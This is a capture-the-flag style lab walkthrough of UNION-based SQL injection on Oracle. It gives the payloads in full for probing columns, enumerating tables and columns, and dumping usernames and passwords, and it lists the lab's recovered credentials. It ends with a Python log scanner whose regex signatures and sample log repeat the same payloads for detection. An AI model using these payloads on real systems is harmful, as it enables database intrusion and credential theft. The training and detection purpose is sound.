SQL injection attack, listing the database content 1
SQL injection attack, listing the database contents on Oracle
Solution
Get number of columns
' UNION SELECT NULL,NULL FROM dual--
Get table_name from all_tables
' UNION SELECT table_name,NULL FROM all_tables--
Get column_name from all_tab_columns
' UNION SELECT column_name,NULL FROM all_tab_columns WHERE table_name = 'USERS_WPDEKE'--
I found two columns:
USERNAME_EJIJIK
PASSWORD_OPTWOW
Get password for user administrator
' UNION SELECT USERNAME_EJIJIK,PASSWORD_OPTWOW FROM USERS_WPDEKE--
I found 3 user/password records:
administrator : l2ddv6bhye9h3mxs9h68
carlos : kyydfqct3bmz6jy4xhy5
wiener : 75uf5kl9cq1bqyxrju9k
Login as user: administrator
administrator : l2ddv6bhye9h3mxs9h68
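
A log-side view of the steps above, as an added example that is not part of the original write-up: it URL-decodes request parameters and labels each UNION SELECT request by the stage it corresponds to (probe against dual, all_tables, all_tab_columns). The /filter endpoint, the category parameter, the log lines and the USERS_EXAMPLE table name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

U = r"\bunion\s+(?:all\s+)?select\b"
# Stage signatures, most specific first; they mirror the steps in the write-up.
STAGES = [
    ("column-enumeration", re.compile(U + r".*\bfrom\s+all_tab_columns\b", re.I | re.S)),
    ("table-enumeration", re.compile(U + r".*\bfrom\s+all_tables\b", re.I | re.S)),
    ("column-count-probe", re.compile(U + r"\s+null(?:\s*,\s*null)*\s+from\s+dual\b", re.I)),
    ("union-select", re.compile(U, re.I)),
]
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" \d{3}')

# Constructed sample access log (hypothetical endpoint, parameter and table name).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /filter?category=Gifts HTTP/1.1" 200 5120
198.51.100.4 - - [01/Jan/2024:10:00:03 +0000] "GET /filter?category=Credit+Union+Gifts HTTP/1.1" 200 812
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /filter?category=%27+UNION+SELECT+NULL%2CNULL+FROM+dual-- HTTP/1.1" 200 5333
203.0.113.7 - - [01/Jan/2024:10:00:21 +0000] "GET /filter?category=%27+UNION+SELECT+table_name%2CNULL+FROM+all_tables-- HTTP/1.1" 200 48211
203.0.113.7 - - [01/Jan/2024:10:00:40 +0000] "GET /filter?category=%27+UNION+SELECT+column_name%2CNULL+FROM+all_tab_columns+WHERE+table_name+%3D+%27USERS_EXAMPLE%27-- HTTP/1.1" 200 5410
203.0.113.7 - - [01/Jan/2024:10:00:58 +0000] "GET /filter?category=%27+UNION+SELECT+USERNAME_X%2CPASSWORD_X+FROM+USERS_EXAMPLE-- HTTP/1.1" 200 5502
"""

def classify(value):
    """Return the first matching stage name for a decoded parameter value, else None."""
    for name, pattern in STAGES:
        if pattern.search(value):
            return name
    return None

def scan(log_text):
    """Return (client_ip, parameter, stage) for every flagged request in the log."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        ip, target = m.group(1), m.group(2)
        # parse_qsl percent-decodes values and turns '+' into spaces
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            stage = classify(value)
            if stage:
                hits.append((ip, key, stage))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

Signature matching like this only surfaces attempts in logs; the injection itself is closed by binding the parameter instead of concatenating it into the query.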